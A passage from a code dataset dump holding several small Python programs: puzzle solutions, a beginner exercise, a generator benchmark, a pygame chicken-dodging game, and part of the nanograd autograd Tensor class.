range(n-1,i,-1):\n\t\t\tif s[j] == s[i]:\n\t\t\t\tok = True\n\t\t\tif s[j] != s[i] and ok:\n\t\t\t\tprint(\"NO\")\n\t\t\t\treturn\n\tprint(\"YES\")\nt = read(int)\nfor i in range(1,t+1):\n\t\t#print(\"Case #{}:\".format(i),end=' ')\n\t\tsolve()\n","sub_path":"codeforces/719/a.py","file_name":"a.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"576442908","text":"import re\nimport numpy as np\n\nifile = open(\"AOTC2015_6.txt\",'r')\nfileLines = []\n\nfor line in ifile:\n fileLines.append(line.rstrip())\n \nifile.close() \n \ntheGrid = np.zeros((1000,1000))\n\n\ninstruct = \"\"\ncords = \"\"\ncord1 = \"\"\ncord2 = \"\" \n\n\ndef toggle(grid, startX, startY, endX, endY):\n for i in range(int(startX), int(endX)+1):\n for j in range(int(startY), int(endY)+1): \n if grid[i,j] == 1:\n grid[i,j] = 0\n else:\n grid[i,j] = 1\n \n \n return grid \n \ndef turn_off(grid, startX, startY, endX, endY):\n for i in range(int(startX), int(endX)+1):\n for j in range(int(startY), int(endY)+1):\n grid[i,j] = 0\n \n return grid\n \ndef turn_on(grid, startX, startY, endX, endY):\n for i in range(int(startX), int(endX)+1):\n for j in range(int(startY), int(endY)+1):\n grid[i,j] = 1\n \n return grid\n\n \n# turnOnCount = 0\n# turnOffCount = 0\n# toggleCount = 0\n \n \nfor i in fileLines:\n oldI = i\n i = i.replace(\" through \",\" \")\n fileLines[fileLines.index(oldI)] = i\n \n m = re.search('\\d', i)\n instruct = i[:m.start()-1]\n cords = i[m.start():]\n \n cord1, cord2 = cords.split(\" \")\n \n cord1_x = cord1[:cord1.find(',')]\n cord1_y = cord1[cord1.find(',')+1:]\n\n cord2_x = cord2[:cord2.find(',')]\n cord2_y = cord2[cord2.find(',')+1:]\n \n if instruct == \"toggle\":\n theGrid = toggle(theGrid, cord1_x, cord1_y, cord2_x, cord2_y)\n #toggleCount +=1\n elif instruct == \"turn off\":\n theGrid = turn_off(theGrid, cord1_x, cord1_y, cord2_x, cord2_y)\n #turnOffCount +=1\n elif instruct == \"turn on\":\n theGrid = turn_on(theGrid, cord1_x, cord1_y, cord2_x, cord2_y)\n #turnOnCount +=1\n else:\n print(\"THERE WAS AN ISSUE: \"+ instruct+\"}\") \n \nprint(sum(sum(theGrid)))\n\n","sub_path":"2015/AOTC2015_6_1.py","file_name":"AOTC2015_6_1.py","file_ext":"py","file_size_in_byte":1929,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"37443748","text":"'''\r\nfaça um algortmo que receba 3 números inteiros e o usuário decida quais das opções o sistema deve retornar:\r\n-a soma dos números\r\n-o maior\r\n-o menor\r\n-a média\r\n'''\r\n\r\nminhaLista = []\r\n\r\n\r\ndef maiorNumero(lista):\r\n lista.sort()\r\n return lista[2]\r\n\r\n\r\ndef menorNumero(lista):\r\n lista.sort()\r\n return lista[0]\r\n\r\n\r\ndef somaNumeros(lista):\r\n return lista[0] + lista[1] + lista[2]\r\n\r\n\r\ndef mediaNumeros(lista):\r\n return (lista[0] + lista[1] + lista[2])/3\r\n\r\n\r\ndef DigiteNumeros():\r\n print(\"Digite três números:\")\r\n numero1 = int(input(\"numero um :\"))\r\n numero2 = int(input(\"numero dois :\"))\r\n numero3 = int(input(\"numero tres :\"))\r\n minhaLista.append(numero1)\r\n minhaLista.append(numero2)\r\n minhaLista.append(numero3)\r\n Escolhas()\r\n\r\n\r\ndef Escolhas():\r\n print(\"Agora escolha o que fazer com os tres numeros:\")\r\n print(\"Selecionar o maior - digite 1\")\r\n print(\"Selecionar o menor - digite 2\")\r\n print(\"Calcular a media - digite 3\")\r\n print(\"Selecionar o somar - digite 4\")\r\n escolha = int(input(\"escolha : \"))\r\n if escolha == 1:\r\n print(\"Maior numero = \", maiorNumero(minhaLista))\r\n if escolha == 2:\r\n print(\"menor numero = \", menorNumero(minhaLista))\r\n if escolha == 3:\r\n print(\"Media dos numeros = \", mediaNumeros(minhaLista))\r\n if escolha == 4:\r\n print(\"Soma dos numeros = \", somaNumeros(minhaLista))\r\n if escolha > 4 or escolha < 1:\r\n print(\"Numeros entre 1 e 4 devem ser usados\")\r\n Escolhas()\r\n\r\nDigiteNumeros()\r\n","sub_path":"algoritmo-maior-menor-media-soma.py","file_name":"algoritmo-maior-menor-media-soma.py","file_ext":"py","file_size_in_byte":1539,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"80417184","text":"import time\nimport os\nimport psutil\n\n\ndef simple_array():\n array = [x for x in range(0, 10**6) if x > 0 and type(x) == int]\n return array\n\n\ndef generation_array():\n for x in range(0, 10**6):\n yield x\n\n\ndef comparison_time():\n start = time.clock()\n simple_array()\n end = time.clock()\n time_result_simple = end - start\n print(\"Время генерации простого списка: \", time_result_simple)\n\n start = time.clock()\n generation_array()\n end = time.clock()\n time_result_generation = end - start\n print(\"Время генерации генерируемого списка: \", time_result_generation)\n\n print(\"Генерация на {} быстрее простого\".format(time_result_simple - time_result_generation))\n\n\ndef comparison_gen():\n simple_proc_start = psutil.Process(os.getpid())\n simple_start_memory = simple_proc_start.memory_info().rss / 10 ** 6\n simple_array()\n simple_proc_end = psutil.Process(os.getpid())\n simple_end_memory = simple_proc_end.memory_info().rss / 10 ** 6\n memory_result_simple = simple_end_memory - simple_start_memory\n print(\"Память генерации простого списка: \", memory_result_simple)\n\n gen_proc_start = psutil.Process(os.getpid())\n gen_start_memory = gen_proc_start.memory_info().rss / 10 ** 6\n generation_array()\n gen_proc_end = psutil.Process(os.getpid())\n gen_end_memory = gen_proc_end.memory_info().rss / 10 ** 6\n memory_result_gen = gen_end_memory - gen_start_memory\n print(\"Память генерации генерируемого списка: \", memory_result_gen)\n\n print(\"Генерация на {} меньше занимает памяти, чем простой\".format(memory_result_simple - memory_result_gen))\n\n\ncomparison_gen()\ncomparison_time()","sub_path":"gen_list.py","file_name":"gen_list.py","file_ext":"py","file_size_in_byte":1842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"306308164","text":"import pygame\r\nimport random\r\n\r\n########################################################################################################################\r\n################################################## Game Setup ##########################################################\r\n########################################################################################################################\r\n\r\npygame.init()\r\n\r\n# Aspect ratio\r\nxDisplay = 800\r\nyDisplay = 600\r\n\r\n# Game sounds\r\nsquishSound = pygame.mixer.Sound(\"squish.wav\")\r\ncrashSound = pygame.mixer.Sound(\"crash.wav\")\r\ngameMusic = pygame.mixer.music.load(\"chicken_dance.wav\")\r\n\r\n# Game art\r\ngameDisplay = pygame.display.set_mode((xDisplay, yDisplay))\r\npygame.display.set_caption(\"Chicken Chaser\")\r\ngameIcon = pygame.image.load(\"chicken_icon.png\")\r\ncarSprite = pygame.image.load(\"tractor_sprite.png\").convert_alpha()\r\nchickenSprite = pygame.image.load(\"chicken_sprite.png\").convert_alpha()\r\nbloodSplatter = pygame.image.load(\"blood.png\").convert_alpha()\r\npygame.display.set_icon(gameIcon)\r\n\r\n# Tractor dimensions and scaling\r\ncarWidth = int(0.105 * xDisplay)\r\ncarHeight = int(0.233 * yDisplay)\r\ncarSprite = pygame.transform.scale(carSprite, (carWidth, carHeight))\r\n\r\n# Chicken dimensions and scaling\r\nchickenWidth = int(0.0925 * xDisplay)\r\nchickenHeight = int(0.123 * yDisplay)\r\nchickenSprite = pygame.transform.scale(chickenSprite, (chickenWidth, chickenHeight))\r\n\r\n# Blood spatter dimensions and scaling\r\nbloodWidth = int(0.1875 * xDisplay)\r\nbloodHeight = int(0.25 * yDisplay)\r\nbloodSplatter = pygame.transform.scale(bloodSplatter, (bloodWidth, bloodHeight))\r\n\r\ncolors = {\r\n \"black\": (0, 0, 0),\r\n \"red\": (255, 0, 0),\r\n \"green\": (0, 255, 0),\r\n \"darkRed\": (175, 0, 0),\r\n \"darkGreen\": (0, 175, 0),\r\n \"brown\": (121, 67, 33)\r\n}\r\n\r\n# Insults for crashes in game\r\nlossCount = -1\r\nlossList = [\r\n \"That's what you call driving?\",\r\n \"Your mother was a hamster!\",\r\n \"Your father smelt of elderberries!\"\r\n]\r\n\r\nclock = pygame.time.Clock()\r\n\r\n########################################################################################################################\r\n############################################ Game Functions ############################################################\r\n########################################################################################################################\r\n\r\n\r\ndef draw_intro_screen():\r\n \"\"\"\r\n Start menu.\r\n \"\"\"\r\n # Animating chicken sprite.\r\n chick_x = xDisplay * 0.1875\r\n chick_y = yDisplay * 0.55\r\n chick_dir = True\r\n\r\n while 1:\r\n for event in pygame.event.get():\r\n quit_program(event)\r\n\r\n # Controls chicken's movement\r\n if chick_x > xDisplay * 0.65 or chick_x < xDisplay * 0.1875:\r\n chick_dir = not chick_dir\r\n\r\n if chick_dir:\r\n chick_x += 5\r\n else:\r\n chick_x -= 5\r\n\r\n # Updates display\r\n gameDisplay.fill(colors[\"darkGreen\"])\r\n pygame.draw.rect(gameDisplay, colors[\"brown\"], (25, 0, xDisplay - 50, yDisplay))\r\n display_message(xDisplay / 2, yDisplay / 3, 75, \"Chicken! Bwak!\")\r\n\r\n draw_chicken(chick_x, chick_y)\r\n\r\n draw_button(\"I'm no chicken!\", 0.15 * xDisplay, 0.75 * yDisplay, 175, 50,\r\n colors[\"darkGreen\"], colors[\"green\"], \"play\")\r\n draw_button(\"Chicken out...\", 0.65 * xDisplay, 0.75 * yDisplay, 175, 50,\r\n colors[\"darkRed\"], colors[\"red\"], \"quit\")\r\n\r\n pygame.display.update()\r\n clock.tick(60)\r\n\r\n\r\ndef draw_button(message, x, y, width, height, inactive_color, active_color, action):\r\n \"\"\"\r\n Generates button at x, y of width and height. Color changes from inactive_color\r\n to active_color on hovor. Action can be either 'Play' or 'Quit'.\r\n \"\"\"\r\n mouse = pygame.mouse.get_pos()\r\n click = pygame.mouse.get_pressed()\r\n\r\n buttonRect = pygame.Rect(x, y, width, height)\r\n\r\n if buttonRect.collidepoint(mouse):\r\n pygame.draw.rect(gameDisplay, colors[\"black\"], (x, y, width, height))\r\n pygame.draw.rect(gameDisplay, active_color, (x + 2, y + 2, width - 4, height - 4))\r\n\r\n if click[0]:\r\n if action == \"play\":\r\n game_loop()\r\n elif action == \"quit\":\r\n pygame.quit()\r\n quit()\r\n else:\r\n pygame.draw.rect(gameDisplay, colors[\"black\"], (x, y, width, height))\r\n pygame.draw.rect(gameDisplay, inactive_color, (x + 2, y + 2, width - 4, height - 4))\r\n\r\n display_message(x + (width / 2), y + (height / 2), 20, message)\r\n\r\n\r\ndef draw_tractor(tractor_x, tractor_y):\r\n \"\"\"\r\n Draws the tractor at tractor_x, tractor_y.\r\n \"\"\"\r\n gameDisplay.blit(carSprite, (tractor_x, tractor_y))\r\n\r\n\r\ndef draw_chicken(chick_x, chick_y):\r\n \"\"\"\r\n Draws a chicken at chick_x and chick_y.\r\n \"\"\"\r\n gameDisplay.blit(chickenSprite, (chick_x, chick_y))\r\n\r\n\r\ndef blood_splatter(blood_x, blood_y):\r\n \"\"\"\r\n Draws blood at coordinates based on blood_x, blood_y.\r\n Coordinates are manually adjusted to center blood over chicken.\r\n \"\"\"\r\n gameDisplay.blit(bloodSplatter, (blood_x - (chickenWidth / 2),\r\n blood_y - (chickenHeight / 2)))\r\n\r\n\r\ndef display_message(horiz, vert, font_size, text):\r\n \"\"\"\r\n Writes text of font_size to display at horiz, vert.\r\n \"\"\"\r\n print_text = pygame.font.Font(\"fixedsys.ttf\", font_size)\r\n text_surface = print_text.render(text, True, colors[\"black\"])\r\n text_rect = text_surface.get_rect()\r\n text_rect.center = (horiz, vert)\r\n gameDisplay.blit(text_surface, text_rect)\r\n\r\n\r\ndef count(game_count, chicken_count):\r\n \"\"\"\r\n Displays updating game_count and chicken_count.\r\n \"\"\"\r\n score_text = \"Score: \" + str(game_count)\r\n chicken_text = \"Remaining: \" + str(chicken_count)\r\n display_message(xDisplay * 0.9, yDisplay * 0.025, 25, score_text)\r\n display_message(xDisplay * 0.15, yDisplay * 0.025, 25, chicken_text)\r\n\r\n\r\ndef crash():\r\n \"\"\"\r\n Game over menu.\r\n \"\"\"\r\n global lossCount\r\n\r\n if lossCount < len(lossList) - 1:\r\n lossCount += 1\r\n else:\r\n lossCount = 0\r\n\r\n while 1:\r\n for event in pygame.event.get():\r\n quit_program(event)\r\n\r\n display_message(xDisplay / 2, yDisplay / 3, 30, lossList[lossCount])\r\n\r\n draw_button(\"Play Again?\", 0.2125 * xDisplay, 0.75 * yDisplay, 130, 50, colors[\"darkGreen\"],\r\n colors[\"green\"], \"play\")\r\n draw_button(\"Chicken out...\", 0.65 * xDisplay, 0.75 * yDisplay, 175, 50, colors[\"darkRed\"], colors[\"red\"], \"quit\")\r\n\r\n pygame.display.update()\r\n clock.tick(60)\r\n\r\n\r\ndef paused(pause):\r\n \"\"\"\r\n Pauses and unpauses the game and the music.\r\n \"\"\"\r\n pygame.mixer.music.pause()\r\n\r\n while pause:\r\n for event in pygame.event.get():\r\n quit_program(event)\r\n\r\n if event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_p:\r\n pause = False\r\n pygame.mixer.music.unpause()\r\n\r\n display_message(xDisplay / 2, yDisplay / 3, 75, \"Paused\")\r\n pygame.display.update()\r\n clock.tick(60)\r\n\r\n\r\ndef win(score, chickens):\r\n \"\"\"\r\n Win menu.\r\n \"\"\"\r\n pygame.mixer.music.fadeout(2000)\r\n\r\n while 1:\r\n for event in pygame.event.get():\r\n quit_program(event)\r\n\r\n display_message(xDisplay / 2, yDisplay / 4, 40, \"Winner winner chicken dinner!\")\r\n display_message(xDisplay / 2, yDisplay / 2, 30, \"Final score: \" + str(score))\r\n average = round(float(score) / float(chickens), 1)\r\n display_message(xDisplay / 2, 3 * yDisplay / 5, 30, \"Average per chicken: \" + str(average))\r\n\r\n draw_button(\"Play again?\", 0.15 * xDisplay, 0.75 * yDisplay, 175, 50,\r\n colors[\"darkGreen\"], colors[\"green\"], \"play\")\r\n draw_button(\"Chicken out...\", 0.65 * xDisplay, 0.75 * yDisplay, 175, 50, colors[\"darkRed\"], colors[\"red\"], \"quit\")\r\n\r\n pygame.display.update()\r\n clock.tick(15)\r\n\r\n\r\ndef quit_program(event):\r\n \"\"\"\r\n Terminates the program if the event is quit.\r\n \"\"\"\r\n if event.type == pygame.QUIT:\r\n pygame.quit()\r\n quit()\r\n\r\n\r\n########################################################################################################################\r\n############################################# Main Game Loop ###########################################################\r\n########################################################################################################################\r\n\r\ndef game_loop():\r\n score = 0\r\n chickenCount = 30\r\n passed = 0\r\n hit = False\r\n\r\n # Starting coordinates for tractor\r\n x_pos = xDisplay * 0.455\r\n y_pos = yDisplay * 0.75\r\n x_change = 0\r\n\r\n # Starting coordinates and speed for chicken\r\n chicken_speed = 0.00833 * yDisplay\r\n chicken_x = random.randrange(25, int(xDisplay - (chickenWidth + 25)))\r\n chicken_y = -yDisplay\r\n\r\n pygame.mixer.music.play(-1)\r\n\r\n while chickenCount > 0:\r\n\r\n # controls\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n pygame.quit()\r\n quit()\r\n\r\n elif event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_LEFT:\r\n x_change = -0.011 * xDisplay\r\n elif event.key == pygame.K_RIGHT:\r\n x_change = 0.011 * xDisplay\r\n elif event.key == pygame.K_p:\r\n paused(True)\r\n\r\n elif event.type == pygame.KEYUP:\r\n if event.key == pygame.K_LEFT or event.key == pygame.K_RIGHT:\r\n x_change = 0\r\n\r\n x_pos += x_change\r\n\r\n # Handles crashing into boundaries\r\n if x_pos + carWidth >= xDisplay + 10 or x_pos <= -10:\r\n pygame.mixer.music.stop()\r\n pygame.mixer.Sound.play(crashSound)\r\n crash()\r\n\r\n # Handles crashing into chickens\r\n if y_pos + 0.03 * yDisplay < chicken_y + chickenHeight and \\\r\n (x_pos + (0.03 * xDisplay) < chicken_x < x_pos + carWidth - (0.03 * xDisplay) or\r\n x_pos + (0.03 * xDisplay) < chicken_x + chickenWidth < x_pos + carWidth - (0.03 * xDisplay) or\r\n x_pos < chicken_x + (chickenWidth / 2) < x_pos + carWidth) and not hit:\r\n pygame.mixer.Sound.play(squishSound)\r\n hit = True\r\n if score >= 50:\r\n score -= 50\r\n else:\r\n score = 0\r\n\r\n # Updates score while on path to crash into chickens.\r\n elif (x_pos + (0.03 * xDisplay) < chicken_x < x_pos + carWidth - (0.03 * xDisplay) or\r\n x_pos + (0.03 * xDisplay) < chicken_x + chickenWidth < x_pos + carWidth - (\r\n 0.03 * xDisplay) or x_pos < chicken_x + (chickenWidth / 2) < x_pos + carWidth) and not hit:\r\n score += int(30 ** (1 / (y_pos - (chicken_y + chickenHeight))))\r\n\r\n # Handles drawing of chickens\r\n if chicken_y > yDisplay:\r\n chicken_y = 0 - chickenHeight\r\n chicken_x = random.randrange(25, int(xDisplay - (chickenWidth + 25)))\r\n chickenCount -= 1\r\n passed += 1\r\n hit = False\r\n # Updates difficulty\r\n if chicken_speed < 0.02 * yDisplay:\r\n chicken_speed += 0.00075 * yDisplay\r\n\r\n # Updates display\r\n gameDisplay.fill(colors[\"darkGreen\"])\r\n pygame.draw.rect(gameDisplay, colors[\"brown\"], (25, 0, xDisplay - 50, yDisplay))\r\n\r\n if hit:\r\n blood_splatter(chicken_x, chicken_y)\r\n else:\r\n draw_chicken(chicken_x, chicken_y)\r\n\r\n draw_tractor(x_pos, y_pos)\r\n chicken_y += chicken_speed\r\n count(score, chickenCount)\r\n\r\n pygame.display.update()\r\n clock.tick(60)\r\n\r\n win(score, passed)\r\n\r\n\r\ndraw_intro_screen()\r\n","sub_path":"ChickenChaser.py","file_name":"ChickenChaser.py","file_ext":"py","file_size_in_byte":11919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"544092142","text":"from typing import Union\nfrom collections import defaultdict\nimport warnings\nimport inspect\nfrom functools import partialmethod\nimport functools\n\nimport numpy as np\nfrom nanograd.viz.comp_graph import ForwardGraphVisualizer, BackwardGraphVisualizer\n\nfrom nanograd.device import Device\nfrom nanograd.nn.buffer import GPUBuffer\n\ncl_ctx, cl_queue = None, None\n\ndef get_gpu_context_and_queue():\n \"\"\"\n If GPU is enabled, get_gpu_context_and_queue populates global variables\n cl_ctx and cl_queue used for GPU computations. \n \n cl_ctx and cl_queue are PyOpenCL objects used for parallelized computations \n on the GPU. More precisely, cl_ctx is expected to be an instance of PyOpenCL \n Context and cl_queue is expected to be an instance of PyOpenCL CommandQueue.\n \"\"\"\n global cl_ctx, cl_queue\n devices = cl.get_platforms()[0].get_devices(device_type=cl.device_type.GPU)\n if len(devices) == 0:\n devices = cl.get_platforms()[0].get_devices(device_type=cl.device_type.CPU)\n cl_ctx = cl.Context(devices=devices)\n cl_queue = cl.CommandQueue(cl_ctx)\n\n\nclass Tensor:\n ops = defaultdict(dict) # Adding to the class several operations\n \"\"\"\n Tensor is the basic operator object of Nanograd. It is \n a wrapper class around NumPy array. \n\n Args:\n data (np.ndarray or int or float or GPUBuffer): Contains data to be stored. It can \n be a scalar, a vector, a matrix or a tensor (multi-dimensional array).\n\n requires_grad (bool, optional): If ``True``, a gradient will be stored and \n accumulated as a property of an object. If ``False``, the grad property \n remains None. No gradient is stored in the object.\n\n is_leaf (bool, optional): If ``True``, the corresponding node in the computational\n graph does not have any parents. Note that it is usually the case for parameters\n in a neural network. If ``False``, the node is expected to have parents. \n Usually a non-leaf node results from a basic operation.\n\n is_parameter (bool, optional): the Tensor contains trainable parameters. It is useful\n when building a neural network.\n\n device (Device, optional): the device to use for computations. Currently, Nanograd only\n supports CPU and GPU.\n\n name (str, optional): A name for the Tensor for visualization purposes.\n\n op (str, optional): The operation used to create the tensor. Could be an addition, a substraction,\n a product.\n\n ..note::\n If the node is gradient-enabled, the grad property is populated with a gradient Tensor\n object during backpropagation.\n \"\"\"\n def __init__(self, \n data:Union[np.ndarray, GPUBuffer], \n requires_grad:bool=False, \n is_parameter:bool=False,\n device:Device=Device.CPU,\n name:str='no_name',\n op:str=None) -> None:\n self.data = self._move_data(data, device)\n self.requires_grad = requires_grad\n self.is_parameter = is_parameter\n\n self.device = device\n\n self.grad = None\n self.ctx = None\n\n self.name, self.op = name, op\n self.children = []\n \n @property\n def shape(self) -> tuple:\n return self.data.shape\n \n @property\n def dtype(self) -> np.dtype:\n return self.data.dtype\n\n @property\n def T(self):\n return self.transpose()\n \n # ****************************************\n # ***** Class methods / Initializers *****\n # ****************************************\n\n @classmethod\n def zeros(cls, *shape, **kwargs):\n \"\"\"Creates a Tensor filled with zeros\"\"\"\n return cls(np.zeros(*shape, dtype=np.float32), **kwargs)\n \n @classmethod\n def ones(cls, *shape, **kwargs):\n \"\"\"Creates a Tensor filled with ones\"\"\"\n return cls(np.ones(*shape, dtype=np.float32), **kwargs)\n \n @classmethod\n def arange(cls, *interval, **kwargs):\n \"\"\"Creates a Tensor filled with values in range\"\"\"\n return cls(np.arange(*interval).astype(np.float32), **kwargs)\n \n @classmethod\n def randn(cls, *shape, **kwargs):\n \"\"\"\n Creates a Tensor filled with values drawn from the\n standard Gaussian distribution\n \"\"\"\n return cls(np.random.randn(*shape).astype(np.float32), **kwargs)\n \n @classmethod\n def normal(cls, loc, scale, *shape, **kwargs):\n \"\"\"\n Creates a Tensor filled with values drawn from the\n a custom Gaussian distribution\n \"\"\"\n return cls(np.random.normal(loc, scale, *shape).astype(np.float32), **kwargs)\n\n @classmethod\n def randint(cls, low, high, *shape, **kwargs):\n \"\"\"\n Creates a Tensor filled with integer values drawn in the\n range between low and high\n \"\"\"\n return cls(np.random.randint(low, high, *shape).astype(np.float32), **kwargs)\n \n @classmethod\n def eye(cls, dim, **kwargs):\n \"\"\"\n Creates a 2-dimensional Tensor (matrix) equal to the\n identity matrix.\n \"\"\"\n return cls(np.eye(dim).astype(np.float32), **kwargs)\n \n # ****************************************\n # *********** CPU/GPU support ************\n # ****************************************\n\n @staticmethod\n def _move_data(data:Union[np.ndarray, GPUBuffer], device:Device):\n \"\"\"\n Moves data to the device specified\n\n Args:\n data (np.ndarray or GPUBuffer): data to be moved\n device (Device): the destination device\n \n Returns:\n data (np.ndarray or GPUBuffer): numpy array if CPU else cl.Buffer\n \"\"\"\n assert device in Device, \"Unsupported device. Only CPU and GPU available.\"\n\n if isinstance(data, GPUBuffer):\n if device == Device.GPU:\n return data\n cpu_data = np.empty(data.shape, dtype=np.float32)\n cl.enqueue_copy(cl_queue, cpu_data, data.cl, is_blocking=True)\n return cpu_data\n \n if not isinstance(data, np.ndarray):\n data = np.array(data, dtype=np.float32)\n\n if device == Device.GPU:\n if cl_ctx is None:\n get_gpu_context_and_queue()\n return GPUBuffer(cl_ctx, data.shape, hostbuf=data)\n\n return data\n\n def to(self, device:Device):\n \"\"\"\n Moves the Tensor to the specified device \n \n Args:\n device (Device): the destination device\n \"\"\"\n self.data, self.device = self._move_data(self.data, device), device\n if self.grad:\n self.grad.to(device) # Recursive call to move the gradient to specified device\n\n def cpu(self):\n self.to(Device.CPU)\n return self\n \n def gpu(self):\n if not PYOPENCL_AVAILABLE:\n raise Exception(\"OpenCL is not installed in this environment. Please consider running \\\n pip install pyopencl to benefit from GPU-accelerated computations.\")\n self.to(Device.GPU)\n return self\n\n # ****************************************\n # *************** Backprop ***************\n # ****************************************\n\n @functools.lru_cache()\n def build_graph_topology(self):\n def dfs(node, visited, nodes):\n visited.add(node)\n if node.ctx:\n for parent in node.ctx.parents:\n if parent not in visited:\n dfs(parent, visited, nodes)\n nodes.append(node)\n return nodes\n return dfs(self, set(), list())\n \n def backward(self):\n if self.shape != (1,):\n raise Exception(\"Can't initiate backprop from a non scalar-valued tensor.\")\n\n self.grad = Tensor.ones(self.shape, device=self.device, requires_grad=False)\n\n for node in reversed(self.build_graph_topology()):\n assert node.grad is not None, 'Got an unitialized gradient node'\n\n gradients = node.ctx.backward(node.ctx, node.grad.data)\n\n if len(node.ctx.parents) == 1:\n gradients = [gradients]\n \n for tensor, grad in zip(node.ctx.parents, gradients):\n if grad is not None: \n assert grad.shape == tensor.shape, f\"Mismatched tensor and grad shape. Got {grad.shape} and {tensor.shape}. \\\n Tensor and gradient should have the same shape.\"\n if tensor.grad is None:\n tensor.grad = Tensor(grad, device=self.device, requires_grad=False)\n else:\n tensor.grad += Tensor(grad, device=self.device, requires_grad=False)\n\n def copy(self):\n \"\"\"Creates a copy of the tensor\"\"\"\n return Tensor(self.data, device=self.device)\n\n def __str__(self):\n return f\"\"\n \n def __repr__(self):\n return self.__str__()\n\n def __getitem__(self, args):\n if args is None: \n args = []\n elif type(args) in [list, tuple]: \n pass\n else: \n args = [args]\n\n indices = []\n\n for i, arg in enumerate(args):\n start, stop = arg.start, arg.stop\n\n if start is None:\n start = 0\n elif not np.issubdtype(type(start), int):\n raise TypeError(f\"Indices must be integer. Got {type(start)}\")\n \n if stop is None:\n stop = self.shape[i]\n elif not np.issubdtype(type(stop), int):\n raise TypeError(f\"Indices must be integer. Got {type(stop)}\")\n elif stop < 0:\n stop = self.shape[i] + stop\n\n assert arg.step is None or arg.step == 1, \"Custom step not yet implemented\"\n indices.append((start, stop))\n \n indices += [(0, shape[i]) for i in range(len(args), len(self.shape))]\n \n return self.slice(indices=indices)\n\n # ****************************************\n # ********** Basic operations ************\n # ****************************************\n \n def __truediv__(self, other):\n return self * (other ** -1.0)\n\n def __sub__(self, other):\n return self + (-other)\n\n def __rsub__(self, other):\n return -self + other\n\n def sqrt(self):\n return self ** 0.5\n \n # ****************************************\n # ******** Reduction operations **********\n # ****************************************\n \n def mean(self, axis=None):\n out = self.sum(axis=axis)\n coeff = np.prod(out.shape) / np.prod(self.shape)\n return out * coeff\n\n # ****************************************\n # ****** Miscellaneous operations ********\n # ****************************************\n\n def flatten(self):\n dim1, dim2 = self.shape[0], np.prod(self.shape[1:])\n out = self.reshape(shape=(dim1, dim2))\n return out\n\n # ****************************************\n # ******** Activation functions **********\n # ****************************************\n \n def log_softmax(self):\n batch_size, num_classes = self.shape\n a = self.max(axis=1).reshape(shape=[batch_size, 1]) # Log-exp trick\n out = self - a - (self - a).exp().sum(axis=1).log().reshape(shape=[batch_size, 1])\n return out\n\n # ****************************************\n # ********* Pool operations *********\n # ****************************************\n\n def _pool1d(self, field_length:int):\n \"\"\"1-dimensional pooling operation\n\n Args:\n field_length (int): length of the pooling kernel\n \n Returns:\n x_reshaped (Tensor): pooled Tensor\n \"\"\"\n x_unpadded = self[:, :, :self.shape[2] - self.shape[2] % field_length]\n\n shape = (x_unpadded.shape[0], x_unpadded.shape[1], \n x_unpadded.shape[2] // field_length, field_length)\n\n x_reshaped = x_unpadded.reshape(shape=shape)\n return x_reshaped \n \n def max_pool1d(self, kernel_size:int=2):\n \"\"\"MaxPooling1d operation\n\n Args:\n kernel_size (int, optional): Kernel length for pooling operation. Defaults to 2.\n \"\"\"\n return self._pool1d(kernel_size).max(axis=3)\n \n def avg_pool1d(self, kernel_size:int=2):\n \"\"\"AvgPooling1d operation\n\n Args:\n kernel_size (int, optional): Kernel length for pooling operation. Defaults to 2.\n \"\"\"\n return self._pool1d(kernel_size).mean(axis=3)\n \n def _pool2d(self, pool_size:tuple):\n \"\"\"\n 2-dimensional pooling operation\n\n Args:\n pool_size (tuple): height of the pooling kernel\n \n Returns:\n x_reshaped (Tensor): pooled Tensor\n \"\"\"\n x_unpadded = self[:, :, \n :self.shape[2] - self.shape[2] % pool_size[0], \n :self.shape[3] - self.shape[3] % pool_size[1]]\n \n shape = (x_unpadded.shape[0], x_unpadded.shape[1], \n x_unpadded.shape[2] // pool_size[0], pool_size[0], \n x_unpadded.shape[3] // pool_size[1], pool_size[1])\n\n x_reshaped = x_unpadded.reshape(shape=shape)\n\n return x_reshaped\n \n def max_pool2d(self, pool_size:tuple=(2, 2)):\n \"\"\"MaxPooling2d operation\n \n Args:\n kernel_size (tuple): Kernel length for pooling operation\n \"\"\"\n return self._pool2d(pool_size).max(axis=(3, 5))\n \n def avg_pool2d(self, pool_size:tuple=(2, 2)):\n \"\"\"AvgPooling2d operation\n \n Args:\n kernel_size (tuple): Kernel length for pooling operation\n \"\"\"\n return self._pool2d(pool_size).mean(axis=(3, 5))\n\n def pad1d(self, pad:tuple):\n \"\"\"Padding for one-dimensional signal\n\n Args:\n pad (tuple): Amount of padding before and after the signal\n\n Returns:\n Tensor: Padded signal\n \"\"\"\n return self[:, :, -pad[0]:int(self.shape[2])+pad[1]]\n\n def pad2d(self, pad:tuple):\n \"\"\"Padding for two-dimensional images\n\n Args:\n pad (tuple): 4-dimensional tuple. Amount of padding to be applied before and\n after the signal along 2 dimensions\n\n Returns:\n Tensor: Padded signal\n \"\"\"\n return self[:, :, -pad[2]:int(self.shape[2])+pad[3], -pad[0]:int(self.shape[3])+pad[1]]\n\n\n # ****************************************\n # ************ Visualization *************\n # ****************************************\n\n def plot_forward(self, rankdir=\"LR\"):\n r\"\"\"\n Plots a forward computational graph\n\n Args:\n rankdir (str): LR (left to right) and TB (top to bottom)\n \"\"\"\n visualizer = ForwardGraphVisualizer()\n return visualizer.visualize(self, rankdir=rankdir)\n \n def plot_backward(self, rankdir=\"LR\"):\n r\"\"\"\n Plots a backward computational graph\n\n Args:\n rankdir (str): LR (left to right) and TB (top to bottom)\n \"\"\"\n visualizer = BackwardGraphVisualizer()\n return visualizer.visualize(self, rankdir=rankdir)\n\n\ndef register(name, operation, device=Device.CPU):\n \"\"\"Registers operation to the Tensor class\n\n More precisely, it populates the ops dictionary by adding CPU and \n GPU operations.\n\n In short:\n ops[device][name] = function\n\n 